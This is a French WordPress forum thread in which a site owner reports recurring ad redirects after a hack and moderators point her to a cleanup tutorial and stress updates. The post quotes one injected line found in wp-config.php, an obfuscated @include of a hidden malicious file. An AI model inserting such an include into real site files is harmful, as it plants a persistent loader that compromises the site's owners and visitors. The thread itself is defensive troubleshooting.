site redirige vers publicité régulièrement (Créer un compte)

  • WordPress :5.7
  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 17)
  • Auteur
    Messages
  • #2374510
    kate66
    Participant
    Padawan WordPress
    90 contributions

    Bonjour,

    je reviens vers vous car nous avons un site et quand on va dessus de temps en temps on est redirigé vers une publicité tout de suite sans accès à notre site.

    Sur la page est indiqué je ne suis pas un robot avec un fond blanc.

    On à detecter avec wordfence des codes ajouté sur des fichiers et des dossier avec des noms bizarre à la racine du serveur tout à été supprimer et la ce matin tout est revenu.

    excemple dans wp-config.php cette ligne en haut de la page.

    @include « 57h157m145/143a154e156d157r161u57w167w57w160-143o156t145n164/165p154o141d163/62061957.64761c142071856i143o »;

    On a installé aussi stop spams mais rien n’y fait et modifier le mot de passe FTP aussi.

    Merci pour vos conseils.

     

    #2374513
    ferman
    Modérateur
    Maître WordPress
    7394 contributions

    Bonjour,

    Espérons que vous n’avez pas été piratée mais j’ai bien peur que si. Testez votre site ICI pour vérifier

    • Cette réponse a été modifiée le il y a 3 années et 10 mois par ferman.
    #2374516
    kate66
    Participant
    Padawan WordPress
    90 contributions

    Merci voici le resultat :

     

    Fichiers joints :
    Vous devez être connecté pour voir les fichiers joints.
    #2374518
    kate66
    Participant
    Padawan WordPress
    90 contributions

    que dois-je faire à ton avis cela n’a pas l’air très bon ?Merci

    #2374520
    ferman
    Modérateur
    Maître WordPress
    7394 contributions

    Non, ce n’est pas bon mais ça se répare même si c’est casse-pieds. Il faut suivre le tuto que @flobogo a pris la peine d’écrire. Un peu de travail et le problème sera réglé. Après il faudra sécuriser le site s’il ne l’est pas déjà. Après, je vois que votre site est sur liste noire. Une fois que tout sera nettoyé il faudra l‘en sortir.

    • Cette réponse a été modifiée le il y a 3 années et 10 mois par ferman.
    #2374523
    kate66
    Participant
    Padawan WordPress
    90 contributions

    merci si je renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web ? MERCI

    #2374524
    kate66
    Participant
    Padawan WordPress
    90 contributions

    Qu’est ce que cela change d’être en liste noir car notre site est tout de même indexé sur Google ? MERCI

    #2374526
    ferman
    Modérateur
    Maître WordPress
    7394 contributions

    C’est le cas pour le moment mais ça risque d’évoluer. Ensuite, s’il est sur liste noire c’est qu’il renvoie vers d’autres adresses, ce que vous constatez et que certains de vos visiteurs, sinon tous, constatent aussi certainement. Vous ne savez pas vers  où ces redirections se font ou se feront dans l’avenir; peut être vers des sites pourris.

    Par exemple l’adresse du site dans les résultats de recherche Google peut renvoyer vers un site de vente de viagra (un grand classique), maintenant ou plus tard. Vous avez regardé dans les résultats Google ?

    • Cette réponse a été modifiée le il y a 3 années et 10 mois par ferman.
    #2374533
    kate66
    Participant
    Padawan WordPress
    90 contributions

    ok je comprends je vais regarder cela par contre si je suis l’etape 1 mon site sera toujours accessible ;

    renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web merci

    #2374536
    kate66
    Participant
    Padawan WordPress
    90 contributions

    si je modifie aussi le mot de passe de la base de donnée si cela est de l’injection cela regalèrerai pas le probleme aussi ? MERCI

    #2374542
    ferman
    Modérateur
    Maître WordPress
    7394 contributions

    Comme vous le voyez vous même dans wp-config, ce sont d’abord les fichiers du site qui sont corrompus. Il doit y en avoir d’autres (par ex wp-load). Il peut aussi y avoir des fichiers additionnels avec des noms trompeurs style wordpress.load ou autre. Changer le mdp de la base de données est inutile à ce stade: le loup est déjà dans la bergerie et il ne sert à rien de fermer la porte. D’ailleurs, la base de donnée est secondaire. C’est juste un espace de stockage et s’il n’y a pas de commande pour stocker ou récupérer les données indésirables, elle est inoffensive.

    renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web merci

    Non, enfin si pour le moment mais à la fin vous renommerez ces dossiers et ce sera comme avant. Bien sûr pendant le temps de la réparation votre site sera indisponible. Choisissez un moment tranquille, mettez en maintenance et faites le nettoyage en suivant complètement le tuto (ça ne devrait pas prendre plus d’une heure ou deux). Lisez bien le tuto avant de commencer. Si vous avez des questions, posez-les.

    • Cette réponse a été modifiée le il y a 3 années et 10 mois par ferman.
    #2374547
    kate66
    Participant
    Padawan WordPress
    90 contributions

    Le thème est the7 mais nous avons pas les codes d’achat cela ne nous empêcherons pas de tout réinstaller ? Merci.

    #2374548
    kate66
    Participant
    Padawan WordPress
    90 contributions

    Nous avons une ancienne version de WordPress et devont nous effectuer la maj du wordpress comme indique en 2 cas de l’aide ou effectuer le 1er cas.

    Merci.

    #2374556
    ferman
    Modérateur
    Maître WordPress
    7394 contributions

    Le plus important est de vous débarrasser du problème et pour ça effectuer toutes les étapes jusqu’à « Bon courage : il y a du travail,… » Pour les mises à jour ça viendra après mais elles seront obligatoires. Si vous avez d’anciennes versions de wp, d’anciennes extensions ou si votre thème n’a pas été mis à jour depuis longtemps c’est la porte ouverte au piratage.

    Pour votre theme the 7, c’est un thème payant mais si vous ne le supprimez pas de wp-content vous pourrez le réactiver. Comme dit ci-dessus, il y a quand même un risque. Il y en a un autre: votre ancienne version (elle date de quand?) risque de ne pas être compatible avec les versions modernes de wordpress (laquelle avez-vous?) et donc il faudrait normalement aussi le mettre à jour. A vous de voir. De toute façon vous serez obligée de le faire tôt ou tard, wordpress changeant très rapidement..

    #2374558
    Flobogo
    Modérateur
    Maître WordPress
    20681 contributions

    Bonjour,

    Votre site est indiscutablement piraté. Vous reconnaissez qu’il n’est pas à jour, avec un thème payant non mis à jour. Le thème est probablement infecté, directement ou via une extension tierce. Il faudra racheter la version à jour, ou changer de thème.

    Comme @ferman vous l’a dit, la seule solution, c’est de suivre entièrement le tuto.

    Si vous voulez être aidée plus, il faut au minimum nous donner l’URL du site. Vous en êtes à plus de 65 posts sur ce forum, avec 47 topics créés, et vous n’avez jamais indiqué votre configuration (ce qui explique au passage que la plupart du temps, vous n’avez pas ou peu de réponses à vos questions).
    Si votre site était celui de la NASA, on comprendrait qu’il soit important de ne pas divulguer l’URL et la configuration, mais je ne pense pas que ce soit le cas.  😁
    A vous de voir : si vous voulez garder secrète votre configuration, alors il va falloir vous débrouiller seule.

15 sujets de 1 à 15 (sur un total de 17)
  • Vous devez être connecté pour répondre à ce sujet.